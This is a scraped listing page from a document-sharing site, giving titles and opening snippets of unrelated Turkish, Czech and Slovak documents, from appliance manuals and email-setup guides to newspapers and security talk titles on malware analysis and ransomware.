C# ile e-posta Göndermek Kemal Demir http://kemal.csharpturk.net kemal@csharpturk.net C# ile e-posta Göndermek 25.12.2006 Web sitemizin üyelerine ya da adreslerini bir yerde biriktirdiğimiz arkadaşlarımıza toplu olarak eposta

Detaylı

MYČKA NÁDOBÍ UMÝVAČKA BULAŞIK MAKINESI ESF6535LOX ESF6535LOW CS SK TR NÁVOD K POUŽITÍ 2 NÁVOD NA POUŽÍVANIE 20 KULLANMA KILAVUZU 38

MYČKA NÁDOBÍ UMÝVAČKA BULAŞIK MAKINESI ESF6535LOX ESF6535LOW CS SK TR NÁVOD K POUŽITÍ 2 NÁVOD NA POUŽÍVANIE 20 KULLANMA KILAVUZU 38 ESF6535LOX ESF6535LOW CS SK TR MYČKA NÁDOBÍ UMÝVAČKA BULAŞIK MAKINESI NÁVOD K POUŽITÍ 2 NÁVOD NA POUŽÍVANIE 20 KULLANMA KILAVUZU 38 2 OBSAH 1. BEZPEČNOSTNÍ INFORMACE... 3 2. BEZPEČNOSTNÍ POKYNY...4 3.

Detaylı

Internet: Tarihçe ve Kavramlar

Internet: Tarihçe ve Kavramlar Internet: Tarihçe ve Kavramlar Umut Al umutal@hacettepe.edu.tr Internet in Tarihçesi 1945 Vannevar Bush memex 1962 Licklider (MIT) Galaktik Ağ 1969 DARPA ARPANET 1972 İlk e-posta 1983 TCP-IP 1991 Gopher,

Detaylı

Dr. Anton Pajonk. 2 In - Suľkováčik Svrčinovec

Dr. Anton Pajonk. 2 In - Suľkováčik Svrčinovec 2 In - Suľkováčik Dr. Anton Pajonk 25. 6. 1953 Svrčinovec Vysokoškolské štúdium ukončil na MVSŠ v Moskve, kde študoval filozofiu, históriu a ekonómiu. V roku 1992 si doplnil kvalifikáciu na Vysokej škole

Detaylı

İÇİNDEKİLER. Amaç. Ürün / Servis Tanımı... 2. Ürün / Servis Özellikleri... 2 Standartlar Ve Kısıtlar... 2 Sistemin Özellikleri...

İÇİNDEKİLER. Amaç. Ürün / Servis Tanımı... 2. Ürün / Servis Özellikleri... 2 Standartlar Ve Kısıtlar... 2 Sistemin Özellikleri... KURUMSAL E-POSTA İÇİNDEKİLER Amaç Ürün / Servis Tanımı... 2 Ürün / Servis Özellikleri... 2 Standartlar Ve Kısıtlar... 2 Sistemin Özellikleri... 3 Destek Ve Bakım... 4 1 AMAÇ Bu dokümanda Turkcell SuperOnline

Detaylı

Exchange Server 2013 Kurulum Sonrası Yapılandırmalar

Exchange Server 2013 Kurulum Sonrası Yapılandırmalar Exchange Server 2013 Kurulum Sonrası Yapılandırmalar Exchange server 2013 CAS kurulumunu da tamamladıktan sonra Client Access Server üzerindeki Exchange Admin Center a bağlanmak için tarayıcıya https://izmir-cas/ecp

Detaylı

EGC3322NVK. SK Varný panel Návod na používanie 2 TR Ocak Kullanma Kılavuzu 19

EGC3322NVK. SK Varný panel Návod na používanie 2 TR Ocak Kullanma Kılavuzu 19 EGC3322NVK SK Varný panel Návod na používanie 2 TR Ocak Kullanma Kılavuzu 19 2 www.electrolux.com OBSAH 1. BEZPEČNOSTNÉ INFORMÁCIE...3 2. BEZPEČNOSTNÉ POKYNY... 5 3. POPIS VÝROBKU... 8 4. KAŽDODENNÉ POUŽÍVANIE...

Detaylı

http://www.mertsarica.com http://twitter.com/mertsarica

http://www.mertsarica.com http://twitter.com/mertsarica Android üzerine Penetrasyon testi üzerine Penetrasyon testi adımları Örnek Zafiyetler Sonuç http://www.mertsarica.com http://twitter.com/mertsarica Ahlaklı Korsan Blog Yazarı Python Programcısı Zararlı

Detaylı

Virtualaze Unify Kurulumu

Virtualaze Unify Kurulumu Kurulum öncesi dikkat edilecek hususlar Virtualaze Unify Kurulumu 1. Kurulumu yapmadan önce Windows güncelleştirmelerinin hepsini tamamlayınız. 2. İşletim sistemi domain de ise,domainden çıkarıp work gruba

Detaylı

API geliştiricileri. Web server ile yapılan entegrasyonun neticeleri. API Dokumantasyonu

API geliştiricileri. Web server ile yapılan entegrasyonun neticeleri. API Dokumantasyonu API geliştiricileri Open API serverınızın tüm kontrolünü, groupware erişim izini, kullanıcı ve domain yonetimi, server ayarları, tasarlanma, istatistikler ve daha fazlasına bu script programı ile erişebilirsiniz.

Detaylı

sk PRÍRUČKA POUŽÍVATEĽA

sk PRÍRUČKA POUŽÍVATEĽA PRÍRUČKA POUŽÍVATEĽA sk Obsah Obsah balenia...3 Pokyny pre rýchly štart... 4 Dôležité informácie...13 Správne použitie... 13 Použitie sondy... 13 Požiadavky na likvidáciu... 14 Technické špecifikácie...

Detaylı

Finans Sektörüne Yönelik Yeni Nesil Tehditler. Burç Yıldırım Mart 2015

Finans Sektörüne Yönelik Yeni Nesil Tehditler. Burç Yıldırım Mart 2015 Finans Sektörüne Yönelik Yeni Nesil Tehditler Burç Yıldırım Mart 2015 Gündem Tehdit Belirleme Güncel Tehditler Kullanıcı Ödeme Sistemleri ATM 2 Tehdit Belirleme 3 Neden? Sayısallaşan teknoloji iş yapış

Detaylı

İÇİNDEKİLER VII İÇİNDEKİLER

İÇİNDEKİLER VII İÇİNDEKİLER İÇİNDEKİLER VII İÇİNDEKİLER 1 EXCHANGE SERVER 1 Geçmiş Sürümler ve Geleceği 2 Exchange Server 2016 ile Gelen Yenilikler 4 İstemci Tarafındaki Yenilikler 5 Birlikte Çalışma Şekilleri 6 Mapi Over HTTP 7

Detaylı

LOGO için Online Mutabakat Kullanım Kılavuzu

LOGO için Online Mutabakat Kullanım Kılavuzu LOGO için Online Mutabakat Kullanım Kılavuzu LOGO Windows Ürünleri için Online Mutabakat LOGO Java Ürünleri için Online Mutabakat Microsoft Excel veri kaynağı için Online Mutabakat Microsoft SQL Server

Detaylı

Kto nahradí českého kouča na striedačke slovenskej hokejovej reprezentácie? o titule rozhodne až 7. zápas! Strana 35. Prievidza vyhrala v Komárne,

Kto nahradí českého kouča na striedačke slovenskej hokejovej reprezentácie? o titule rozhodne až 7. zápas! Strana 35. Prievidza vyhrala v Komárne, Štvrtok 14. 5. 2015 69. ročník číslo 109 cena 0,60 App Store pre ipad a iphone / Google Play pre Android Prievidza vyhrala v Komárne, o titule rozhodne až 7. zápas! Strana 35 NAJLEPŠIE KURZY SUPERŠANCA

Detaylı

4. Sunucu ayarları veya ek sunucu türlerinı manüel olarak yapılandır'a tıklayın ve İleri'yi tıklayın.

4. Sunucu ayarları veya ek sunucu türlerinı manüel olarak yapılandır'a tıklayın ve İleri'yi tıklayın. Yalova Üniversitesi email adresini outlook ile kullanmak için, bilgisayarınızda kurulu Outlook sürümüne bağlı olarak ücretsiz olarak Microsoft Office Outlook Connector programını indirebilir veya POP3

Detaylı

Siemens SINEMA RC Sertifika Geçerlilik, Otomatik Güncelleme ve NTP zaman senkronizasyonu

Siemens SINEMA RC Sertifika Geçerlilik, Otomatik Güncelleme ve NTP zaman senkronizasyonu 2018 Siemens SINEMA RC Sertifika Geçerlilik, Otomatik Güncelleme ve NTP zaman senkronizasyonu Eren, Ilker (RC-TR PD PA CI) Unrestricted Ilke.eren@siemens.com wwww.siemens.com/.tyr.simatic.net[type text]

Detaylı

Secure Vendor Administration Tool (SVAT) HP Yeni Tedarikçi Talimatları: Firmanızı HP'nin Tedarikçi Veritabanı na Nasıl Kayıt edebilirsiniz

Secure Vendor Administration Tool (SVAT) HP Yeni Tedarikçi Talimatları: Firmanızı HP'nin Tedarikçi Veritabanı na Nasıl Kayıt edebilirsiniz (SVAT) HP Yeni Tedarikçi Talimatları: Firmanızı HP'nin Tedarikçi Veritabanı na Nasıl Kayıt edebilirsiniz Global Procurement Last Updated: 30 March 2012 Içindekiler Konu: 1 HP nin firmanızın detaylarına

Detaylı

B2C E-Ticaret. İşletmeden Tüke ciye E-Ticaret. Sa n almak için yardım alın STANDART AVANTAJLI PROFESYONEL

B2C E-Ticaret. İşletmeden Tüke ciye E-Ticaret. Sa n almak için yardım alın STANDART AVANTAJLI PROFESYONEL B2C E-Ticaret İşletmeden Tüke ciye E-Ticaret B2c e caret modeli son kullanıcıya direk ürün sa şı yapabilmeni sağlayan e caret türüdür. Yüksek kapasiteli b2c e caret yazılımları ile kaliteli ve sorunsuz

Detaylı

LOGO için Online Mutabakat Kullanım Kılavuzu

LOGO için Online Mutabakat Kullanım Kılavuzu LOGO için Online Mutabakat Kullanım Kılavuzu SQL Bağlantı Bilgileri Server : Kullanıcısı : Şifre : Veri Tabanı : LOGO ürünü veri tabanının barındırıldığı MS SQL sunucu adı. LOGO ürünü veri tabanına bağlantı

Detaylı

Outlook ve benzeri programların Ayarları

Outlook ve benzeri programların Ayarları Outlook ve benzeri programların Ayarları İletişim bilgileri Tel: 3340 3341 e-mail: nyg.yardim@mail.ege.edu.tr İçindekiler BÖLÜM1 PROGRAM AYARLARI 1.1. Microsoft Outlook programı aracılığı ile kişisel bilgisayara

Detaylı

E-Pazaryeri yazılımı ile sınırsız mağazalar oluşturabilir ve sınırsız ürün sa şı yaparak komisyon ve reklam geliri elde edebilirsin. C2C 6.

E-Pazaryeri yazılımı ile sınırsız mağazalar oluşturabilir ve sınırsız ürün sa şı yaparak komisyon ve reklam geliri elde edebilirsin. C2C 6. E-Ticaret Tüke ciden Tüke ciye E-Ticaret Türkiye nin ilk ve tek c2c e caret yazılımı ile yüksek nitelikli c2c e caret siteleri oluştur. Sana uygun e caret pake ile şimdi e-pazaryerini kur. Sa n almak için

Detaylı

Ajanda ; Fatih KARAALİOĞLU Kurucu Üye Portal Yöneticisi

Ajanda ; Fatih KARAALİOĞLU Kurucu Üye Portal Yöneticisi Ajanda ; Güvenlik Tehditlerimiz 2 Eylul 2009 Çarşamba Güvenlik Çözüm İhtiyaçlarımız Forefront Güvenlik Ürün Ailesi Forefront Security for Exchange 16 Eylul 2009 Çarşamba Forefront for Client Security 7

Detaylı

9. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II. Öğr.Gör. Hakan YILMAZ. hakanyilmaz@karabuk.edu.tr

9. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II. Öğr.Gör. Hakan YILMAZ. hakanyilmaz@karabuk.edu.tr 9. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II Öğr.Gör. Hakan YILMAZ hakanyilmaz@karabuk.edu.tr Karabük Üniversitesi Uzaktan Eğitim Uygulama ve Araştırma Merkezi 2 İçindekiler Request Nesnesinin Özellikleri

Detaylı

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO :

SÜRE BAŞLAMA TARİHİ : 19/12/2018 BİTİŞ TARİHİ : 20/02/2019 KURS SÜRESİ : 144 Saat KURS NO : 2018-2019 Eğitim-Öğretim Yılı Konya / Hüyük Hüyük Halk Eğitimi Merkezi Müdürlüğü Bilişim Teknolojileri Alanı Siber Tehdit İstihbaratı (Cyber Threat Intelligence) Kurs Planı SÜRE BAŞLAMA TARİHİ : 19/12/2018

Detaylı

Active Speaker System

Active Speaker System 4-116-208-62(1) Active Speaker System Návod k použití CZ Návod na obsluhu SK Kullanma Talimatları TR Upute za uporabu HR SRS-DF30 2008 Sony Corporation VAROVÁNÍ Aby se snížilo riziko požáru a nebezpečí

Detaylı

ZAMOTANÝ LEV MINULÁ JAR NÁS NEMÁTA! KAROL BELANÍK: BECK MAL NA DEL POTRA TEŠÍ SA HOSSA, TEŠÍ SA CHICAGO BITKU VYHRALI KOŠICE SUPERŠANCA

ZAMOTANÝ LEV MINULÁ JAR NÁS NEMÁTA! KAROL BELANÍK: BECK MAL NA DEL POTRA TEŠÍ SA HOSSA, TEŠÍ SA CHICAGO BITKU VYHRALI KOŠICE SUPERŠANCA Sobota 18. 2. 2012 66. ročník číslo 41 cena 0,50 Váš liek na krízy každého druhu SUPERŠANCA 1 X 2 1X X2 12 9178. LIBEREC HRADEC KRÁLOVÉ 1,45 4,40 8,00 1,08 2,85 1,22 9179. SPARTA SLOVÁCKO 1,29 5,20 11,0

Detaylı

http://www.mertsarica.com http://twitter.com/mertsarica mert.sarica@gmail.com

http://www.mertsarica.com http://twitter.com/mertsarica mert.sarica@gmail.com mert.sarica@gmail.com Neden zararlı yazılım analizi? Klasik zararlı yazılım analizi Ofansif zararlı yazılım analizi Araçlar üzerine Sonuç http://www.mertsarica.com http://twitter.com/mertsarica Mesai saatlerinde...

Detaylı

Dersin İçeriği (Temel Bilgi Teknolojileri)

Dersin İçeriği (Temel Bilgi Teknolojileri) Bilgisayara Giriş Bilgisayarların Tarihçesi İlk Bilgisayarlar Kişisel Bilgisayarlar ve Sonrası Bilgisayarların Yapısı ve Bileşenleri Bilişim Sistemleri ve Etkileri Bilgisayar ve Donanım Donanım Birimleri

Detaylı

ENN2800BOW CS CHLADNIČKA S NÁVOD K POUŽITÍ 2 SK CHLADNIČKA S NÁVOD NA POUŽÍVANIE 20 TR BUZDOLABI KULLANMA KILAVUZU 38

ENN2800BOW CS CHLADNIČKA S NÁVOD K POUŽITÍ 2 SK CHLADNIČKA S NÁVOD NA POUŽÍVANIE 20 TR BUZDOLABI KULLANMA KILAVUZU 38 ENN2800BOW CS CHLADNIČKA S NÁVOD K POUŽITÍ 2 MRAZNIČKOU SK CHLADNIČKA S NÁVOD NA POUŽÍVANIE 20 MRAZNIČKOU TR BUZDOLABI KULLANMA KILAVUZU 38 2 OBSAH 1. BEZPEČNOSTNÍ INFORMACE... 3 2. BEZPEČNOSTNÍ POKYNY...4

Detaylı

Malware Analizi Yöntem ve Araçları. Huzeyfe ÖNAL Huzeyfe.onal@bga.com.tr Bilgi Güvenliği AKADEMİSİ Twitter: @bgakademisi @huzeyfeonal

Malware Analizi Yöntem ve Araçları. Huzeyfe ÖNAL Huzeyfe.onal@bga.com.tr Bilgi Güvenliği AKADEMİSİ Twitter: @bgakademisi @huzeyfeonal Malware Analizi Yöntem ve Araçları Huzeyfe ÖNAL Huzeyfe.onal@bga.com.tr Bilgi Güvenliği AKADEMİSİ Twitter: @bgakademisi @huzeyfeonal Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Eğitmen, Pentester, Danışman,

Detaylı

ENFORMATİK Dersin Amacı

ENFORMATİK Dersin Amacı ENFORMATİK - 2015 Dersin Amacı Bilgisayar ve donanımlarını tanıtmak, Temel bilgi teknolojisi kavramlarını ve uygulamalarını tanıtmak, İşletim sistemini etkin bir şekilde kullanmak, İnternet ve İnternet

Detaylı

Yandex mail ve disk kullanım rehberi

Yandex mail ve disk kullanım rehberi Yandex mail ve disk kullanım rehberi Tüm personelin ortak bir platformda uyumlu çalışmasını destekleyecek bilgi teknolojisi ücretsiz bir şekilde kurumunuz için hayata geçirildi. Sistem ve sunucu yatırımı

Detaylı

SANAL POS TEST BİLGİ DOKÜMANI. Versiyo n. Versiyon 1.3. 17 Ocak 2013 NESTPAY SANAL POS TEST BİLGİ DOKÜMANI

SANAL POS TEST BİLGİ DOKÜMANI. Versiyo n. Versiyon 1.3. 17 Ocak 2013 NESTPAY SANAL POS TEST BİLGİ DOKÜMANI SANAL POS TEST BİLGİ DOKÜMANI Versiyon 1.3 17 Ocak 2013 Versiyo n Tarih Açıklama 1.4 17.01.2013 Test kartı bilgileri güncellendi. İNDEKS Test Bilgileri Hakkında Önemli Bilgi... 3D Modeline Göre Test Bilgileri...

Detaylı

Web Tasarımının Temelleri

Web Tasarımının Temelleri 1. Hafta Web Tasarımının Temelleri Öğr. Gör. Murat YAZICI www.muratyazici.com Artvin Çoruh Üniversitesi, Artvin Meslek Yüksekokulu www.artvin.edu.tr Temel Kavramlar İnternet HTML WWW HTTP, HTTPS FTP Web

Detaylı

1 WEB GÜVENLIĞINE GIRIŞ

1 WEB GÜVENLIĞINE GIRIŞ İÇİNDEKİLER VII İÇİNDEKİLER 1 WEB GÜVENLIĞINE GIRIŞ 1 Hack & Hacker Kavramları 3 Siyah Şapkalı Hacker lar 4 Beyaz Şapkalı Hacker lar 4 Gri Şapkalı Hacker lar 4 CEH (Certified Ethical Hacking) 5 En Büyük

Detaylı

İNTERNET VE BİLGİ AĞLARININ KULLANIMI

İNTERNET VE BİLGİ AĞLARININ KULLANIMI İNTERNET VE BİLGİ AĞLARININ KULLANIMI İnternet, birçok bilgisayar sisteminin birbirine bağlı olduğu, dünya çapında yaygın olan ve sürekli büyüyen bir iletişim ağıdır. TCP/IP (Transmission Control Protocol/Internet

Detaylı

SİBER SUÇLARA KARŞI SİBER ZEKA

SİBER SUÇLARA KARŞI SİBER ZEKA SİBER SUÇLARA KARŞI SİBER ZEKA Aytuğ Çelikbaş Sistem Mühendisi Copyright 2013 EMC Corporation. All rights reserved. 1 2 Ajanda Günümüz Tehditleri Güvenlikte Büyük Veri Yaklaşımları Siber İstihbarat Atak

Detaylı

Turkcell e-fatura sahte e-postaları şeklinde daha profesyonelce hazırlanmış ve daha hedefli ataklarla karşımıza çıkıyor.

Turkcell e-fatura sahte e-postaları şeklinde daha profesyonelce hazırlanmış ve daha hedefli ataklarla karşımıza çıkıyor. Cryptolocker ve Ransomware (fidye) virüsleri en tehlikeli zararlı yazılımlardan ve maalesef ki farklı varyasyonları ile karşımıza çıkmaya devam ediyor. İlk zamanlarda çözüm bulunamayan virüslere karşı

Detaylı

JBoss Seam Next Generation Integration Framework

JBoss Seam Next Generation Integration Framework JBoss Seam Next Generation Integration Framework Melih Sakarya www.melihsakarya.com melih.sakarya@gmail.com www.mergecons.com Seam Framework JSF JPA Hibernate EJB 3.0 Ajax RichFaces A4J Drools itext PDF

Detaylı

Bilindik engelleme yöntemlerinin dışında olan, kurumsal web filitreleri nasıl aşılır?

Bilindik engelleme yöntemlerinin dışında olan, kurumsal web filitreleri nasıl aşılır? Bilindik engelleme yöntemlerinin dışında olan, kurumsal web filitreleri nasıl aşılır? Not : Yazdıklarım tamamen öğretim amaçlıdır. Yaşanacak her türlü sıkıntının sorumlusu uygulayan kişidir. Sorumluluk

Detaylı

Teknoloji ile Tanışalım

Teknoloji ile Tanışalım 2 ANKARA MAMAK MEHMET ÇEKİÇ ORTAOKULU 1.4. BİT Nİ KULLANMA ve YÖNETME 1.4. BİT Nİ KULLANMA ve YÖNETME Ankara, 2014 Hazırlayan: Mustafa KATLANÇ 3 1.4.1. TEKNOLOJİ İLE TANIŞALIM 4 Teknoloji ile Tanışalım

Detaylı

RSA ANAHTAR DAĞITIMI VE RSA İLE DİJİTAL İMZA OLUŞTURMA

RSA ANAHTAR DAĞITIMI VE RSA İLE DİJİTAL İMZA OLUŞTURMA RSA ANAHTAR DAĞITIMI VE RSA İLE DİJİTAL İMZA OLUŞTURMA İlk defa 1977 yılında Ron Rivest, Adi Shamir ve Leonard Adleman tarafından oluşturulan RSA algoritması geliştiricilerinin soyisimlerinin ilk harfleriyle

Detaylı

Html temelleri. Ders 4

Html temelleri. Ders 4 Html temelleri Ders 4 1 Giriş World Wide Web (Kısaca web) uygun protokoller kullanarak haberleşen yazılımların çalıştırıldığı internet üzerindeki sistemlerin bir koleksiyonudur. Çoğu sistem gününüzde en

Detaylı

Bilgisayar Ağları ve Ağ Güvenliği DR. ÖĞR. ÜYESİ KENAN GENÇOL HİTİT ÜNİVERSİTESİ ELEKTRİK-ELEKTRONİK MÜH.

Bilgisayar Ağları ve Ağ Güvenliği DR. ÖĞR. ÜYESİ KENAN GENÇOL HİTİT ÜNİVERSİTESİ ELEKTRİK-ELEKTRONİK MÜH. Bilgisayar Ağları ve Ağ Güvenliği DR. ÖĞR. ÜYESİ KENAN GENÇOL HİTİT ÜNİVERSİTESİ ELEKTRİK-ELEKTRONİK MÜH. TCP/IP (Transmission Control Protocol/Internet Protocol) Bilgisayarlar arasında veri haberleşmesini

Detaylı

İş Mektup. Mektup - Adres

İş Mektup. Mektup - Adres - Adres Mr. J. Rhodes Rhodes & Rhodes Corp. 212 Silverback Drive California Springs CA 92926 Amerikan adres formatı: sokak numarası+sokak ismi ilçe ismi+il kısaltması+posta kodu Mr. Adam Smith Smith's

Detaylı

ESF6535LOX ESF6535LOW CS MYČKA NÁDOBÍ NÁVOD K POUŽITÍ 2 SK UMÝVAČKA NÁVOD NA POUŽÍVANIE 20 TR BULAŞIK MAKINESI KULLANMA KILAVUZU 38

ESF6535LOX ESF6535LOW CS MYČKA NÁDOBÍ NÁVOD K POUŽITÍ 2 SK UMÝVAČKA NÁVOD NA POUŽÍVANIE 20 TR BULAŞIK MAKINESI KULLANMA KILAVUZU 38 ESF6535LOX ESF6535LOW CS MYČKA NÁDOBÍ NÁVOD K POUŽITÍ 2 SK UMÝVAČKA NÁVOD NA POUŽÍVANIE 20 TR BULAŞIK MAKINESI KULLANMA KILAVUZU 38 2 OBSAH 1. BEZPEČNOSTNÍ INFORMACE... 3 2. BEZPEČNOSTNÍ POKYNY...4 3.

Detaylı

Akademik Bilişim Konferansları Kurs Öneri Formu, v2.1. (Formun Sonundaki Notlar Bölümünü Lütfen Okuyunuz)

Akademik Bilişim Konferansları  Kurs Öneri Formu, v2.1. (Formun Sonundaki Notlar Bölümünü Lütfen Okuyunuz) Akademik Bilişim Konferansları www.ab.org.tr Kurs Öneri Formu, v2.1 (Formun Sonundaki Notlar Bölümünü Lütfen Okuyunuz) 1. Adı, Soyadı Pınar Çomak 2. Ünvanı/Görevi Araştırma Görevlisi 3. Kurum/Kuruluş Orta

Detaylı

ETIKA, ETICKÁ INFRAŠTRUKTÚRA AKO PREVENCIA KORUPCIE

ETIKA, ETICKÁ INFRAŠTRUKTÚRA AKO PREVENCIA KORUPCIE ETIKA, ETICKÁ INFRAŠTRUKTÚRA AKO PREVENCIA KORUPCIE Eília Sièáková ¼ubica Sliáková ETIKA, ETICKÁ INFRAŠTRUKTÚRA AKO PREVENCIA KORUPCIE Oponentúra: Daniela Zeanovièová CPHR - Transparency International

Detaylı

A. IMAP ve POP ayarlarını etkinleştirmek için sıradaki adımları takip edebilirsiniz.

A. IMAP ve POP ayarlarını etkinleştirmek için sıradaki adımları takip edebilirsiniz. AHİEVRAN ÜNİVERSİTESİ EPOSTA AYARLARI İçindekiler AHİEVRAN ÜNİVERSİTESİ EPOSTA AYARLARI.... 1 A. IMAP ve POP ayarlarını etkinleştirmek için sıradaki adımları takip edebilirsiniz.... 1 B. Eposta Yönlendirme...

Detaylı

Başvuru Motivasyon Mektubu / Ön Yazı

Başvuru Motivasyon Mektubu / Ön Yazı - Giriş Sayın Yetkili, Resmi, erkek alıcı, bilinmeyen isim Sayın Yetkili, Resmi, bayan alıcı, bilinmeyen isim Sayın Yetkili, Resmi, bilinmeyen alıcı ismi ve cinsiyeti Vážený pane, Vážená paní, Vážený pane

Detaylı

Başvuru Motivasyon Mektubu / Ön Yazı

Başvuru Motivasyon Mektubu / Ön Yazı - Giriş Vážený pane, Resmi, erkek alıcı, bilinmeyen isim Vážená paní, Resmi, bayan alıcı, bilinmeyen isim Vážený pane / Vážená paní, Resmi, bilinmeyen alıcı ismi ve cinsiyeti Sayın Yetkili, Sayın Yetkili,

Detaylı

TÜBİTAK UEKAE ULUSAL ELEKTRONİK ve KRİPTOLOJİ ARAŞTIRMA ENSTİTÜSÜ

TÜBİTAK UEKAE ULUSAL ELEKTRONİK ve KRİPTOLOJİ ARAŞTIRMA ENSTİTÜSÜ TÜBİTAK UEKAE ULUSAL ELEKTRONİK ve KRİPTOLOJİ ARAŞTIRMA ENSTİTÜSÜ GÜVENLİ KURUMSAL MESAJLAŞMA UYGULAMASI Ulusal Elektronik İmza Sempozyumu, 7-8 Aralık 2006 İsmail GÜNEŞ E-posta:ismail@uekae.tubitak.gov.tr

Detaylı

Pondelok ročník číslo 36 cena 0,60

Pondelok ročník číslo 36 cena 0,60 Pondelok 13. 2. 2017 71. ročník číslo 36 cena 0,60 Š-32/3 App Store pre ipad a iphone / Google Play pre Android Hrdinka Rebecca V Hre o Niké sa roztrhlo vrece s výhrami, hráči si rozdelili 115 000 eur!

Detaylı

Yönetici rehberi. Emerald Insight araştırma platformunun kurumsal yönetim alanının kullanımına yönelik hızlı başvuru rehberi.

Yönetici rehberi. Emerald Insight araştırma platformunun kurumsal yönetim alanının kullanımına yönelik hızlı başvuru rehberi. Yönetici rehberi Emerald Insight araştırma platformunun kurumsal yönetim alanının kullanımına yönelik hızlı başvuru rehberi www.emeraldinsight.com Emerald, işletme ve yönetim alanlarında önde gelen bir

Detaylı

Víta vás Sun & Fun Holidays

Víta vás Sun & Fun Holidays Víta vás Sun & Fun Holidays MILÍ CESTUJÚCI! Sun & Fun Holidays je zahraničná spoločnosť s dlhoročnými skúsenosťami v oblasti cestovného ruchu, ktorá sa etablovala na slovenskom trhu v roku 2017. Našu širokú

Detaylı

Ön Koşullar : Temel Network

Ön Koşullar : Temel Network Network Forensics Eğitim Detayları Eğitim Süresi : 4 Gün Kontenjan : 12 Ön Koşullar : Temel Network Eğitim Hakkında Günümüz sosyal yaşamın parçası haline gelen siber dünyaya bağımlılık arttıkça bu durum

Detaylı

Hewlett Packard Enterprise Supplier Setup Instructions. Hewlett Packard Enterprise Yeni Tedarikçi Talimatları: Firmanızı Hewlett Packard

Hewlett Packard Enterprise Supplier Setup Instructions. Hewlett Packard Enterprise Yeni Tedarikçi Talimatları: Firmanızı Hewlett Packard Hewlett Packard Enterprise Supplier Setup Instructions Hewlett Packard Enterprise Yeni Tedarikçi Talimatları: Firmanızı Hewlett Packard Enterprise'nin Tedarikçi Veritabanına Nasıl Kayıt edebilirsiniz Global

Detaylı

1. Sertifika istenmesi

1. Sertifika istenmesi Tele Tıp için SSL sertifikasının alınması ve ISS yüklenmesi için yapılması gerekli işlemlerin anlatan yardım dokümanıdır. Tüm işlemler PACS sunucusu üzerinden yapılmalıdır. 1. Sertifika istenmesi a. Sub

Detaylı

B T A n a l o g T r a n s m i t t e r. T e k n i k K ı l a v u z u. R e v 1. 2

B T A n a l o g T r a n s m i t t e r. T e k n i k K ı l a v u z u. R e v 1. 2 B T - 111 A n a l o g T r a n s m i t t e r T e k n i k K ı l a v u z u R e v 1. 2 1. Ö N G Ö R Ü N Ü M, Ü S T Ü N L Ü K L E R İ VE Ö Z E L L İ K L E R İ M i k r o k o n t r o l ö r t a b a n l ı BT- 111

Detaylı

Yeni Nesil Güvenlik Duvarlarında Olması Beklenen Özellikler ve Uygulama Bazlı Filtreleme

Yeni Nesil Güvenlik Duvarlarında Olması Beklenen Özellikler ve Uygulama Bazlı Filtreleme LOGO Yeni Nesil Güvenlik Duvarlarında Olması Beklenen Özellikler ve Uygulama Bazlı Filtreleme Mustafa COŞAR - İsmail ARIK Hitit Üniversitesi Bilgi İşlem Daire Başkanlığı Ağ Güvenliği ve Önemi Kurumsal

Detaylı

Sophos SSL VPN Ayarları ve SSL VPN Clinet Programı Kurulumu

Sophos SSL VPN Ayarları ve SSL VPN Clinet Programı Kurulumu Sophos SSL VPN Ayarları ve SSL VPN Clinet Programı Kurulumu SSL VPN yapılandırmasında ilk önce Sophos Firewall ayarlamalarını yapacağız. Sophos Firewall cihazımıza bağlanıyoruz. 1. Kullanıcı Hesabı Tanımlama

Detaylı

Android Uygulamalarında Güvenlik Testi

Android Uygulamalarında Güvenlik Testi Android Uygulamalarında Güvenlik Testi Şubat ayında Gartner tarafından yayımlanan bir rapora göre dünya genelinde 2011 yılının 4. çeyreğinde satılan akıllı telefonların %50.9 unda Android işletim sisteminin,

Detaylı

Temel Bilgisayar Uygulamaları Web Tasarımı, Programlama Dilleri ve C# a Giriş

Temel Bilgisayar Uygulamaları Web Tasarımı, Programlama Dilleri ve C# a Giriş Kitap: Örneklerle Algoritma ve C# Programlama - Erhan Arı C# Giriş C# yazmak için Windows ta Visual Studio, Mac te Xamarin Studio kullanırız. Bi C# Projesi oluşturmak için Visual Studio da: File(Dosya)->New

Detaylı

1-20 Kullanıcı. 2*Xeon 2.4 GHZ 4 GB 2*146 GB 15k (Raid 1) c: 30 GB, d: 110. 21-40 Kullanıcı. 21-40 Kullanıcı. 41-80 Kullanıcı.

1-20 Kullanıcı. 2*Xeon 2.4 GHZ 4 GB 2*146 GB 15k (Raid 1) c: 30 GB, d: 110. 21-40 Kullanıcı. 21-40 Kullanıcı. 41-80 Kullanıcı. OPERA 1-20 Kullanıcı SINGLE SERVER 2*Xeon 2.4 GHZ 4 GB 2*146 GB 15k (Raid 1) c: 30 GB, d: 110 SINGLE SERVER 21-40 Kullanıcı 4*Xeon 2 GHZ 6GB 8*146 GB 15k (Raid 1+0) c:=40 GB, d:>=540 APPLICATION SERVER

Detaylı

AKİS ARAYÜZ YAZILIMI KURULUM VE KULLANIM KILAVUZU

AKİS ARAYÜZ YAZILIMI KURULUM VE KULLANIM KILAVUZU TÜBİTAK BİLGEM UEKAE and should not be reproduced, copied or disclosed to a third party without the written consent of the proprietor. TÜBİTAK UEKAE ULUSAL ELEKTRONİK VE KRİPTOLOJİ ARAŞTIRMA ENSTİTÜSÜ

Detaylı

Gelecekteki tehditlere bakış& Yeni Nesil Güvenlik

Gelecekteki tehditlere bakış& Yeni Nesil Güvenlik Comprehensive Network Security Gelecekteki tehditlere bakış& Yeni Nesil Güvenlik Ürünlerimiz Emre AKTAŞ Cyberoam Türkiye/ Ülke Müdürü Unified Threat Management İçerik Güncel Eğilimlere ve Sorunlara Genel

Detaylı

ELEKTRICKÉ KONVEKTORY

ELEKTRICKÉ KONVEKTORY Od roku ELEKTRICKÉ KONVEKTORY Modely: EPK4550E05 EPK4570E10 EPK4570E15 EPK4590E20 EPK4590E25 Modeller: EPK4550M05 EPK4570M10 EPK4570M15 EPK4590M20 EPK4590M25 UŽÍVATEĽSKÝ MANUÁL ENVIRONMENTÁLNA POLITIKA

Detaylı

Fidye Virüslerinden Korunma Rehberi

